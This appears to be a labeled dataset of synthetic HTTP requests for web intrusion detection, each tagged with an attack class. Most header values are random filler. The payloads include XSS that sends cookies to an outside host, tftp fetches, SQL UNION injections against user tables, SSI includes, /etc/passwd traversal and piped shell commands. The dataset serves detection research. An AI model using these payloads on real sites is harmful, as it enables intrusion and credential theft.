If-None-Match: "VpPG3EnI8skUU4Z5cDCP"
If-Range: "fx.pk1bS2L0Jx--N"
Max-Forwards: 7
MIME-Version: 4.7
Pragma: d='Ioemim'
Proxy-Authorization: NTLM ZWVOaWxhTG1zUmFpaDRhbG9oSjMzTGFhbzFlbW5lZWk0ZXRlSWV1ZWhuaA==
Authorization: Basic aUlnRWF1OmltZFhpZg==
Referer: /srine/ifsn/tran1.tiff
TE: chunked,trailers,gzip;q=0.7
Trailer: Warning
User-Agent: iZ9v3. http://www.5ilhe.biz
UA-CPU: 68000
UA-Disp: 9585,9750,32
UA-OS: Linux
UA-Color: color8
Via: 5.4 2.32.141.59, 7.6 136.67.91.118:3, FTP/2.0 www.m6Npe.gif
Transfer-Encoding: identity
Upgrade: nI4c/2.6
Warning: 092 www.sRueG.htm:35899 "atSmsu2feBlep0ass3" "Fri, 30 Jun 06 18:47:30 CET"
X-Forwarded-For: 248.13.251.126
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41245
Start - Id: 47466
class: XSS
GET /libdb/emo4/12f./t-SxRT8w9DzSCKDtVfJ/czhoipnvpoqao3aeE/likeXQ9ydeleteGK@.nsf?trte=%3Cimg+++++src++++%3D++%22+livescript%3A%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.la.com%2Fcgi-bin%2Fetrontte.cgi%27%2Bdocument.cookie%29%3B%5D+++%22+++%3E HTTP/1.1
Host: www.dnaelI0d.st:2
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, compress;q=0.1, deflate;q=0.6, gzip;q=0.7
Accept-Language: *
Cache-Control: no-cache
Client-ip: 146.143.28.253
Cookie: hlceiHdePz=519;ntdlyesthIpi=bftLsY9;eeAnico=11;stoanepeammsnd=;n7tdropmteh;i42i0ojTso=i\;ceAtaynlhtaehp=ehtgroup byeLh
Cookie2: $Version="37"
Date: Wed, 13 Feb 08 04:23:10 UTC
ETag: W/"SqJHa4ar3l1_aYG"
Expect: 100-continue
From: oou9@rIjx.it
If-Modified-Since: Wed, 11 Oct 06 07:18:41 GMT
If-Unmodified-Since: Fri, 29 Sep 06 12:24:47 CET
If-Match: "gL6YtxnaTEOBiKMPbbB"
If-None-Match: *
If-Range: Wed, 07 May 08 07:22:11 UTC
Max-Forwards: 2
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: ohttg htuneE=et8ju
Authorization: Digest algorithm=MD5-sess
Range: 307-,052-4971
Referer: /h1kahet.nsf
TE: deflate,deflate;q=0.8,gzip;q=0.8
Trailer: From
User-Agent: Mozilla/5.7 (Machintosh; U; PPC Mac OS X 8.6; nh-E6; rv:4.7.3) Gecko/07910082
UA-CPU: MIPS
UA-Disp: 2372,1267,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 4671x382
Via: 9.5 214.176.0.28:6399, FTP/5.2 www.nsej.png:9, zaeuRq/9.2 www.pybkrou.htm
Transfer-Encoding: compress
Upgrade: rshhh0/1.3
Warning: 434 www.stheqS.htm "2se9l4zCow3t" "Tue, 16 Nov 04 07:44:37 CET"
X-Forwarded-For: 250.184.177.153
X-Serial-Number: 48112496441051
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47466
Start - Id: 46473
class: XSS
GET /<script>alert('Vulnerable')</script>.shtml? HTTP/1.1
Host: www.httl.com:80
Connection: cxldnnY
Accept: application/zip;q=0.1
Accept-Charset: windows-874;q=0.8
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 209.77.63.143
Cookie: pncspr=:a;anmailautoexecnull3GX=asdeeaopEstmd4bu
Cookie2: $Version="2"
Date: Mon, 22 Oct 07 22:20:42 UTC
ETag: "TClpSRyVRpjXpah"
Expect: ufTim
From: oeed@ro5sY.uk
If-Modified-Since: Fri, 24 Jul 09 20:17:12 UTC
If-Unmodified-Since: Sat, 08 Sep 07 15:48:17 GMT
If-Match: *
If-None-Match: "KelgZwzD12KEShLkLB5"
If-Range: "EHImig7PXy59Qtju"
Max-Forwards: 8896
Pragma: yr7s=lslO
Proxy-Authorization: Digest cnonce="eAenecin"
Authorization: amaehe o10hf=qsbte
Range: -540
Referer: http://e6c9eoa.st/met5.php4
TE: trailers,gzip
User-Agent: alc2hict2ey4e
UA-Disp: 133,558,32
UA-OS: Linux
UA-Pixels: 920x981
Via: ela/4.6 175.235.33.7
Transfer-Encoding: deflate
Upgrade: fyos/6.8, iroag/5.4, 3rX/2.7, eCy/4.0, vUar/8.3

null

End - Id: 46473
Start - Id: 44620
class: OsCommanding
GET /dBfJkE23Ex/Tt/echooblinkNVfKMIIdwp-/doIhRCYcBY72/6iiY1-zmQ/ozJHuc/PYJ5.tiff?n6CR=kuht&yncakwlah1=249.177.140.98+%7C++tftp+192.168.10.33+evil.txt&rsni=p9ntswe4sn HTTP/1.0
Host: www.oPeec.biz
Connection: keep-alive
Accept: image/*;q=0.5, image/*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 199.28.5.222
Cookie: uh2aaiwdr=44790590;uot=5iorip atit;
Cookie2: $Version="361"
Date: Sun, 16 Apr 06 21:29:33 CET
ETag: W/"gkaNyei91XNxgaZu"
From: ad237uo@EsXlle.it
If-None-Match: *
If-Range: "_z3f37Nw.QMBK-."
Pragma: yiniep=unta
Authorization: Basic OXM2eW5yOnVKbXQ1bkly
Referer: http://www.pessBdkn.fr/asnt/haeEiC/esdlr4eo/etAe.zip
TE: deflate,trailers,trailers
User-Agent: Mozilla/7.7 (Windows; U; Win 9x 3.9; fl-l3; rv:6.2.4) Gecko/59080195
UA-Disp: 5966,1214,32
Via: 4.7 210.122.213.2
Warning: 713 www.5hi1.png:3491 "euraaru3tewoaaaheo" "Mon, 03 May 10 06:40:58 UTC"
X-Forwarded-For: 243.158.215.195
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44620
Start - Id: 39802
class: SSI
GET /iooOdmqn7h/ys/5Y9Iwob2/eWUD_rHm3kZHXARcO/7hnoflnotia9eoelte/t5KbqDVca37@.swf?oBEff=Tkbnnen3l5imyt&oceeteo=sieh&rHQpA0332y=433369&9h2a9sq9Hfia=ryaa&aa5nNs5d=hCgvs&8Q4DPuhjreplace=oees7onolei&asgetn=966998203&7ttaidhrm=%3C%21--+++%23include++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+--%3E&tmdc=on+iaps9a%5Bf2a&6nphpWtnE53=44&8nf=tdoQxx%40L&4Kz-h6=Neile&htaccesUwhereF2c=etattus2c6 HTTP/1.1
Host: 71.75.86.67:0202
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: windows-1255, x-mac-chinesesimp;q=0.8, big5, x-mac-cyrillic
Accept-Encoding: gzip
Accept-Language: tw-4escuta, w-rma;q=0.6, tv4tlsDo-rEhu, 8tiunwg-xnclpn2
Cache-Control: e='ejMl'
Client-ip: 88.15.240.28
Cookie: 2QWMY4YZ1=2tI esteypaSrug;rhaHreszoaaax37=RiElipA;ms-G=1973;rtnryolitobe0=eDassoeiey
Cookie2: $Version="9"
Date: Fri, 03 Aug 07 05:15:41 UTC
ETag: W/"HB4MgAj2e0M.0QXb"
Expect: dNlo
From: ye9onue@h6iInorn.ch
If-Modified-Since: Mon, 25 Aug 08 22:09:53 GMT
If-Unmodified-Since: Thu, 06 Nov 08 06:28:18 GMT
If-Match: "5S2a5xeq29wu6Auy"
If-None-Match: *
If-Range: Sun, 23 Oct 05 10:53:14 GMT
Max-Forwards: 94
MIME-Version: 1.9
Pragma: eutiedla='ienmj'
Proxy-Authorization: Digest nc=Ca5d26eD
Authorization: NTLM bnRuaXJocmJHaWFIMHl1ZGVJZGRjYW90RTJzenRnNHJsNQ==
Range: 2975-
Referer: http://dhIirn.net/Ptntuy/aeOm/ojlpRmej/srmyii.pl
TE: trailers,gzip,trailers
Trailer: Trailer
User-Agent: ilrlevioce (t_sIZTM; 902Z1rh-M; tSuVRaK; uHxkXuekK)
UA-CPU: Sparc
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 468x7869
Via: HTTP/4.3 www.geBiqrHi.tiff, 5.5 49.157.254.236
Transfer-Encoding: gzip
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
X-Forwarded-For: 142.194.73.31
X-Serial-Number: 0280999804959
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39802
Start - Id: 41496
class: SqlInjection
PUT /a4Xo_/Del0ale741ehxzhwirdr/v4fJ7AiPt/eF4jYLEQ@7laGt8rLM/qlhn9ioroo2nlgA/f88XemQmO3HV@Qlf.cgi? HTTP/1.1
Content-Length: 140
Content-Language: ltsu
Content-Encoding: identity
Content-Location: /uE0a/IieiAhu/cT5a93Am/fs3n.swf
Content-MD5: eGxpcmxubG1jYnN1ZTBzaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 Mar 10 18:36:01 GMT
Last-Modified: Fri, 18 Sep 09 22:14:03 UTC
Host: www.Rryrtc.uk:80
Connection: keep-alive
Accept: text/plain;q=0.1
Accept-Charset: cp-932;q=0.0, euc-cn
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=03
Client-ip: 221.158.6.21
Cookie: smabmitsCni=oIo0fZkmVQL;ZKkROO1openpR=4fs7nyieA;EuNipdGhCybei=dsno1deleteo;meearUthydiiH=uh3e8aDneoei7r;eeiaAwngcarnnfh=ld7S;drtouuzelHae=aemirrlet
Cookie2: $Version="965"
Date: Sat, 10 Jul 04 13:49:59 CET
ETag: W/"NnRIYgITDhjc.iBg"
Expect: maEbbf
From: 8raL@hudstis9.fr
If-Modified-Since: Fri, 01 Sep 06 24:59:04 GMT
If-Unmodified-Since: Mon, 02 Feb 04 11:56:52 UTC
If-Match: *
If-None-Match: *
If-Range: "th3lyxRd9U4FTWxVZa"
Max-Forwards: 370
MIME-Version: 4.4
Pragma: xjtueY='Noa3a2d'
Proxy-Authorization: NTLM aTVjZGF0c1NkdG5yemVpd2xmVGVUOGVtbzdMaHB3aW5zZWV0ZWlhcnJhcmVleWE=
Authorization: Basic eHJlZWVJOnNuc2Ry
Range: 78-403185
Referer: /eTens/ted7/et2eTo/Mfczh/osRp.txt
TE: deflate;q=0.9,trailers,gzip
Trailer: Upgrade
User-Agent: a3bnnuqk3kcn
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5893x919
Via: HTTP/0.8 www.welddp.shtml, 4.2 169.122.156.182
Transfer-Encoding: ibssb
Upgrade: tgh/9.5, bumnsf/4.1, dt1/2.5, imuous/2.6
Warning: 111 www.Ieeee3e.gif "edowgieoaEca" 
X-Forwarded-For: 131.117.242.175
X-Serial-Number: 6237226305508453843
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

2eeroeAp=;lan&hhbhtrAiOs=a&jNAUAWMM.=ns'  UNION   /**/    SELECT   2WeeJOb    FROM  dba_users     WHERE   enLepdjn    like  '%25

End - Id: 41496
Start - Id: 41685
class: SqlInjection
GET /sdCLjqo3Lj/vaOHbfvfy3_wKt7rMcqy/0dmtJ/walodrw0ht/oV/raemtheEeEa/lo2qruUU4mitv/wS6McVuHP9oa-77/zl8/HGA/YstdinXO3w/rL4h0hTUTHo61.sh?hnuLe1nnmie=8&cifn4nashonosoA=select+++aah+from++ALL_USERS&Mbon=94135&WsFvbscriptTyp9boot.ini2=iiZnpassthru86oe&wtti=4020275&hnlndn=25887643&vrlrtimatot4=war%3C&rye5wpa4bmyT=Byesock_streameoqisnonntl&oHWechols1FAK=63154312 HTTP/1.0
Host: www.murgDon.it
Connection: 8ETwiic
Accept: */*
Accept-Charset: koi8;q=0.0, x-mac-roman, windows-1258;q=0.5, x-mac-icelandic, iso-8859-3
Accept-Encoding: *;q=0.1
Accept-Language: r5nnopn-bEael5
Cache-Control: no-store
Client-ip: 106.39.43.168
Cookie: eihren=8639;0j0Ipyh=1522184;23bnp=t-W;8efertr=i7RckUmE.bD
Cookie2: $Version="1"
Date: Sat, 16 Sep 06 03:05:37 UTC
ETag: "_JdHqc5lPurFiLmz"
Expect: 100-continue
From: ube8gesO@rdptemmi.st
If-Modified-Since: Sun, 24 Aug 08 20:53:29 GMT
If-Unmodified-Since: Wed, 28 Jan 09 20:35:06 CET
If-Match: "xoPSHlY2Od6._xoDTKi"
If-None-Match: "Xqu2mkatyNAiS.xIl"
If-Range: "1TjoPZvynQQX@yLAV"
Max-Forwards: 1
MIME-Version: 7.5
Pragma: w='hyag8d'
Proxy-Authorization: NTLM bGVkbGpuZW1ucXRsb2JnZWJiZWVmVW0ycGVzbWxpaTRWbVNHeQ==
Authorization: Aato8 oEoat=n1i8daro
Range: 87689-74,-52021,11-
Referer: http://2RtPxs.uk/ieNqq2/pTtefsE/sdha/buunoSe.gif
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/1.8 (compatible; noonyjvit; Win 9x; eqypje)
UA-CPU: PowerPC
UA-Disp: 1862,8220,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 232x3893
Via: 5.8 www.2eweqi.htm, 4zeNn/1.7 www.r4x8sO.gif, FTP/3.3 www.9A8k.shtml
Transfer-Encoding: deflate
Upgrade: ejee8/3.0, Ldl/8.9, Bvm1/7.4
Warning: 118 2.156.64.121 "naglietszhgs" 
X-Forwarded-For: 39.208.247.75
X-Serial-Number: 611965021882313
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41685
Start - Id: 46363
class: PathTransversal
GET /ke/rNUY.o-d5flzaH6jtyt/4et5gA3nmpm/R-U_Fa/Wv-mWk9dKccmochaa/elbanoiitac7iYo/iotvFOe3govhXgdATmaS/v8eOyz/9mpHSANl/i-KYQ1rYi/tc./7antcnupisoea.html?lpq5e=401418574&smggshlfEsC=%2Fetc%2Fpasswd&RJxsock_streamcGpnode@serviceslocation8=810207&ecdnhEto0at=94823235&xoutebtuhniY=copyt HTTP/1.1
Host: 223.38.241.13
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1250, iso-8859-5, iso-8859-9;q=0.0
Accept-Encoding: *
Accept-Language: Zn9-etfa, 8v-SotFj1;q=0.9
Cache-Control: no-store
Client-ip: 191.28.125.93
Cookie: g2=dwartbnaekls;7Sh64WF8rd=697577689
Cookie2: $Version="64"
Date: Fri, 06 Apr 07 10:37:11 UTC
ETag: W/"O6CVj03f@WFfucmV6x"
Expect: aitsn
From: cewts@1fgr.fr
If-Modified-Since: Mon, 15 Oct 07 01:00:37 CET
If-Unmodified-Since: Wed, 06 Aug 08 11:44:01 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 24 Oct 09 20:27:07 GMT
Max-Forwards: 559
MIME-Version: 1.9
Pragma: irgert=timouttA
Proxy-Authorization: NTLM YWFHbUVzVWVJY2E0dmY0bHNybWVkbnJuUmJlMHNhamlobG8zdXM=
Authorization: Digest uri=http://www.avahdta.net/hyot/amng/gsrc/Rik9h/setooq.exe
Range: 405245-17797
Referer: /cnSsetxH/eel5u/n2su.pl
TE: chunked
Trailer: Via
User-Agent: Mozilla/5.5 (Machintosh; U; PPC Mac OS X 7.6; pu-la; rv:5.2.6) Gecko/60776737
UA-CPU: StrongARM
UA-Color: color32
UA-Pixels: 648x2225
Via: FTP/5.0 www.ekEdy.png, HTTP/1.8 www.Kawrss.css, 3.5 www.nrdeC9n.shtml
Transfer-Encoding: deflate
Upgrade: tarad/0.1, sawaj/0.5, aeLes/2.3
Warning: 298 47.169.61.113 "pr6idci4mnm8" "Fri, 15 May 09 02:27:43 UTC"
X-Forwarded-For: 241.79.66.180
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46363
Start - Id: 41536
class: SqlInjection
POST /@6MZZimg6_@r/9o/Rei/raetDr5toogmoetr/ryGLp9/oteep6F9B/passthruinclude1F/ueSoBidZhi5dprhtbyhr.gif? HTTP/1.0
Content-Length: 339
Content-Language: odls
Content-Encoding: identity
Content-Location: /obunn/tonTso.swf
Content-MD5: d3R0aG1kYWNiZXJveFNibg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 15 Jul 04 08:26:51 UTC
Last-Modified: Thu, 12 Jun 08 08:40:27 GMT
Host: www.xa4et4.cz:80
Connection: keep-alive
Accept: application/*, text/*, application/*;q=0.1
Accept-Charset: *;q=0.7
Accept-Encoding: compress;q=0.7, compress, deflate, compress, compress;q=0.6
Accept-Language: *
Cache-Control: max-stale=2105
Client-ip: 124.86.136.28
Cookie: rcrgE9194i=9807713;rys02iwX=lulri3nrh48
Cookie2: $Version="111"
Date: Tue, 20 Mar 07 17:08:05 CET
ETag: "mrtdH9HyC.OhBO."
Expect: 100-continue
From: feAns@ntri9.gov
If-Modified-Since: Sun, 24 Sep 06 17:59:51 CET
If-Unmodified-Since: Fri, 06 Feb 09 14:21:04 CET
If-Match: *
If-None-Match: "dVSHK_3F.qyPIgec"
If-Range: Mon, 03 May 10 12:11:04 GMT
Max-Forwards: 9
Authorization: NTLM c3FvcmRmZWljb3ltZUF4VGF1bWloc2lkaG9OaG50bWhl
Range: 57094-3
Referer: http://www.ehmbel.com/jlfvAl/atapIo/l8ydite/h865ttN/Anass.bin
TE: deflate,trailers,gzip
User-Agent: tntses
UA-OS: WinNT
UA-Color: color8
Via: 1.9 www.opea.tiff
Transfer-Encoding: identity
Upgrade: ied/4.5, ed6tn/2.3, fotom/3.2, ooni/6.1, hhIt/6.5

asa8sgffgbnitno=e9bgsound&asotuszvqc6or=6699023&rspsnanmbi=xi3to3&IelocationR3odhEj=6aeb2s7tthttps8b$8n&hl1rhnazas=and  0<>(select   count(*)    from   tmhaa     where   gpsni<>)&rotaaioueh9a52=R$)&ljx4moAan=rhttprfthomeS&0eEarinnhnpqsry=olechlEQ9u5aw&nmrshrthhtevc=929317&XB.q8A=55fd1ftrSelg&&eu7Dawtuuh=a&seiw4=e5

End - Id: 41536
Start - Id: 43998
class: OsCommanding
GET /ssi/envout.bat?|dir%20..............1 HTTP/1.1
Host: 67.124.204.65
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=1
Client-ip: 89.252.55.156
Cookie: vr=twtaeznhart9nexoih;rDlstsaNITwtnqt=t&cZneuunionuy4~boot.inigmocha7;8O9QOEskWU=iEn~tanctqshrktB;rqqt4ucar9n=tw9N@-O;alelpe4eew=Eoyil;SmeD=76
Cookie2: $Version="691"
Date: Mon, 02 May 05 24:02:50 CET
ETag: "WKKEhSDEdJpn_XZ.E"
Expect: inTns
From: 44fa@mshrPyo.gov
If-Modified-Since: Thu, 19 Jan 06 07:19:51 GMT
If-Unmodified-Since: Sun, 26 Jun 05 11:25:57 GMT
If-Match: "US6yND.1@Sd7N1n"
If-None-Match: *
If-Range: "gc_XYyzHgev@FjjJ"
Max-Forwards: 3081
MIME-Version: 9.9
Pragma: 9=tyhewA
Proxy-Authorization: Qyeeu qzNllaee=zsachi
Authorization: Basic aW1lT2U6aWdzbm51a2g=
Range: 7-,5039-10447,-749
Referer: http://in4eHr.ch/fbtezd/yfyt/RIjgn/dilMhsee.css
TE: trailers
Trailer: Referer
User-Agent: Mozilla/1.6 (Machintosh; U; Mac OS X 9.2; hh-he; rv:9.2.6) Gecko/65306642
UA-CPU: x86
UA-Disp: 402,257,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5667x180
Via: 4.1 www.wuoe.css
Transfer-Encoding: ikai; mnotso=9pei
Upgrade: agn/0.4, vta7/4.8, rtn/3.1, o0tD/9.3
Warning: 170 126.27.186.211 "do3kdsikezlS" "Fri, 29 May 09 15:50:00 UTC"
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 337660
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43998
Start - Id: 43020
class: OsCommanding
PUT /oarwe/d1X7hQNMl/x881e1hevRszr7Wqo5/1GNuA/rphpO0bM1openF3ZVstdin-@/adcnnuj/mO_scriptEb21_/aebCdbayeiDeeehda/rgq/4ijf1psfxQnf9Wz/rrn9roo/stfrx.css? HTTP/1.1
Content-Length: 147
Content-Language: ontpp,i,a
Content-Encoding: deflate
Content-Location: http://arymSre.biz/oehyade/cEoih/mlndj/egoE.swf
Content-MD5: OGlwanByRGFoZXZhbzd1cw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 05 Mar 08 06:40:20 GMT
Last-Modified: Thu, 30 Mar 06 20:04:01 UTC
Host: www.w88iHy.com:829
Connection: close
Accept: application/zip, video/quicktime;q=0.4, application/*;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 93.74.84.6
Cookie: grYXftpyFdeleteJ_=39736
Cookie2: $Version="6"
Date: Tue, 08 Apr 08 10:56:01 CET
ETag: "MCaPKcldcM8leI_Vy"
Expect: hnujl5=enoyt;3ssa
From: odyrata@nanebCh8fa.gov
If-Modified-Since: Wed, 01 Jun 05 12:23:03 CET
If-Unmodified-Since: Mon, 24 Apr 06 19:14:14 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 00
Pragma: no-cache
Proxy-Authorization: Basic c3Nya3BzZWk6VGlhaUdp
Authorization: Basic ZW55aGU6Z2l6c3dzZGU=
Range: 171-10,013-0,-6
Referer: /waae1hoh/hgtau/ensgvx7i/rem2y.mp3
TE: gzip;q=0.5,deflate
Trailer: Pragma
User-Agent: Mozilla/6.9 (Machintosh; U; PPC 1.8; ur-gi; rv:8.0.7) Gecko/85052907
UA-Color: color32
UA-Pixels: 2695x320
Via: 0.3 www.5hN0l.shtml:9, HTTP/8.5 168.223.20.107, 3.1 www.ohwoubri.gif
Transfer-Encoding: eskz; 7Zzp=eWjaRe2
Upgrade: p2tir/9.7, ante/3.0, yetR/9.1, 99uamy/7.6
Warning: 165 65.108.226.121 "iitydon3trejesioefo" "Sun, 09 Oct 05 21:24:18 UTC"
X-Forwarded-For: 225.212.15.105
X-Serial-Number: 4857297063808
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

s1=ciiln=~&neno=gfmroppe2elnen&0arae9ee=aezlua&pdoSIlE1ats=ls -las   /home/     |&ieEizyernLnof=e0i87u4&in=215913337&yidpmuio=aDVh0XjebRu

End - Id: 43020
Start - Id: 46451
class: PathTransversal
PUT /aZt/ncnQVXvz9i_y/9uttoio/e9Xrr2iicbuLhYEXu/uj37L6yV_Gz/Eaw/8t1o/rth/.9KjrmY-Tl.gif? HTTP/1.0
Content-Length: 118
Content-Language: 60oehsr,H,orTto9ep
Content-Encoding: identity
Content-Location: /iMiokir/wwpwDi/eLel.sh
Content-MD5: d2V3d25kY3hnYXJwbGFmdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 15 Apr 06 01:28:42 GMT
Last-Modified: Mon, 30 Jun 08 20:19:19 CET
Host: www.onrtrg7adn.gov
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.9
Accept-Encoding: compress, identity;q=0.8, deflate, deflate;q=0.6, compress
Accept-Language: NyzNoeew-osis9
Cache-Control: max-age=104
Client-ip: 240.207.78.8
Cookie: ft=\.\.\/\.\.\/etc\/lItsr2.conf
Cookie2: $Version="62"
Date: Tue, 06 Jul 04 03:00:34 CET
ETag: W/"fZjz@U791LTHRkqn"
From: e16e@ooahgw.com
If-Modified-Since: Mon, 09 Oct 06 05:19:14 UTC
If-Unmodified-Since: Wed, 02 Jun 04 03:38:47 CET
If-Match: "7haw3@mf72lA1w6@55RI"
If-None-Match: *
If-Range: Thu, 29 Nov 07 12:19:09 CET
Max-Forwards: 633
MIME-Version: 2.0
Pragma: h=hc
Proxy-Authorization: Basic ZXR1bzphczVydg==
Authorization: zNetMh uwit=mW9oT
Range: 006717-347661
Referer: /tifbhe/wrehr/enrle/ooanw/9eefe.jpeg
TE: trailers,gzip,trailers
User-Agent: Mozilla/0.8 (Windows; U; WinNT 8.0; mp-Re; rv:6.2.4) Gecko/21851467
UA-CPU: PowerPC
UA-Disp: 5969,209,16
UA-OS: Windows NT
Via: 5.3 www.gstf.htm, FTP/9.3 www.EaIHae.jpeg
Transfer-Encoding: identity
Upgrade: ena/1.1
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

OKDDlchfH=eTs|f3engillrvr positionvt&trg=e9.y@U&2iD89h=3&sstno=6&Zusr.a47=6032602&ell6n8D=sR&nidboedtisoa8el=Sbomn

End - Id: 46451
Start - Id: 40891
class: SSI
GET /oekyavmprl56t/nNSBrf7G3.bin?lIeuljsadgoi1s=9tip8a&oowa=%3C%21--%23odbc++++statement%3D++++%22select+++++ban%2C+ShYO%2C++ls9ho4t+from+++wroef++++order+++++by+++++2%2C+++012%2C+++7%22++++--%3E&uielssOoa=62428&-7jd5L9ALUO=t%28O%7Efz%29dtcleautoexec&mOweeh4eot=030390&r5essalge=di9S0&htd1T=866049&gtu=ihp&eryenjhue=xc5c&9bsRsmejdern4tn=CdyradnMV&ose=r39pg7Nq8FHt HTTP/1.0
Host: 80.201.84.185
Connection: f5thUe
Accept: application/rtf, application/*;q=0.9, application/zip
Accept-Charset: euc-kr;q=0.8
Accept-Encoding: 
Accept-Language: Rm-uncetitn, ey2-l28do;q=0.7, 1gm-9aibeA;q=0.2
Cache-Control: only-if-cached
Client-ip: 74.22.128.43
Cookie: D4hhnna6tgx=4076658244;xclohtoaafs=passwd ;1snnTien3rcH0=f0lK3Y;ctanrste6box=84989;z3tCnwise=emafauu;eireOUsO4ed=sock_streamroe
Cookie2: $Version="39"
Date: Wed, 05 Jan 05 24:16:03 CET
ETag: W/"cdUEMz1rdtb6L7v"
Expect: 100-continue
From: iead0@nuqh1.org
If-Modified-Since: Fri, 07 Aug 09 04:00:05 GMT
If-Unmodified-Since: Thu, 21 Aug 08 02:38:54 CET
If-Match: *
If-None-Match: *
If-Range: "PZkeTTUinjclUqHyzJ1"
Max-Forwards: 123
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic dHQybmlKOmVtc3dzckFy
Authorization: tltUu nost2=n6rl5
Range: 453-748
Referer: http://eetn.st/ntooa6/pr6np/ilskdq/tIu58dn.mpg
TE: deflate
Trailer: If-Unmodified-Since
User-Agent: Mzgnn/0.2.7.5
UA-CPU: x86
UA-Disp: 8926,1457,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5993x410
Via: HTTP/1.2 75.45.88.71
Transfer-Encoding: compress
Upgrade: i72f/4.9, Zi2a/5.6, sifx9/9.1
Warning: 063 170.129.30.215:3080 "tttenlbdte1UerRsne1h" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 1967556980
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40891
Start - Id: 47415
class: XSS
GET /dnd2TntorcrESeli/dJIGBhpz/eQbgW.EaG4/bK2lpQN/c-ik/sN/1i.E@t@Qlv-I9.png?eantysieLott=dte&r5DwiUss=4&rcxrdettmhlahmh=c&nEdulNm=isetc&ttiatttseq=ohtau+++style%3Dleft%3Aexpression%28alert+%28is8h8s.RTs%29%29&nlenl9m=n&W@k25_cdeleteOhtaccesxP=4926198&-H9Wtpsc-@=704 HTTP/1.1
Host: www.mhOt3ut.org:80
Connection: close
Accept: application/*, video/*
Accept-Charset: cp-932, iso-8859-8, x-mac-arabic, euc-jp;q=0.4, iso-8859-6;q=0.2
Accept-Encoding: 
Accept-Language: nqTntew-aeim
Cache-Control: min-fresh=242
Client-ip: 210.252.219.246
Cookie: iEri=mp7iMiaran1e
Cookie2: $Version="9"
Date: Sun, 01 Aug 04 01:55:31 CET
ETag: W/"QWUjZ4EE_zuMajbKCL"
Expect: 100-continue
From: Tfteutit@rtorijsiis.be
If-Modified-Since: Fri, 19 May 06 14:05:41 CET
If-Unmodified-Since: Wed, 14 Jan 04 18:29:53 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 571
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: nuoe nldti=eta2nt
Authorization: NTLM b25hZG9zZWhkeWhwdHZtcWVsaHQxZTl6TWZubGwzdmllV2F1YmM4dG5pYXZyYWVu
Range: 25658-9605
Referer: /irtfna/a1enhsgp/mhgikla.png
TE: trailers,deflate;q=0.4,chunked
Trailer: If-Range
User-Agent: eAGorn http://www.ye4z0nam.net
UA-CPU: StrongARM
UA-Disp: 488,2720,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1670x058
Via: 3.9 www.loig.css
Transfer-Encoding: deflate
Upgrade: s8ps/3.5, oy10/6.8
Warning: 029 www.8bsannTr.png "tiuS0ahxectarQgg" "Sat, 24 Jan 04 03:40:28 GMT"
X-Forwarded-For: 14.95.154.93
X-Serial-Number: 42081713059681814203
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47415
Start - Id: 45427
class: PathTransversal
PUT /cRA5AG/hlnpEnerstlnwsn/eAmenteambdoF/Vbv/etuJjf/vsaiframefrombmttgV/mqKCLhmjsmIoA8G/e9Tpjb_I7QIuzp7j.jpeg? HTTP/1.0
Content-Length: 280
Content-Language: T,st12ittO
Content-Encoding: identity
Content-Location: /0eai7.rar
Content-MD5: cnRtaWxoTnNteWRwZWFzeA==
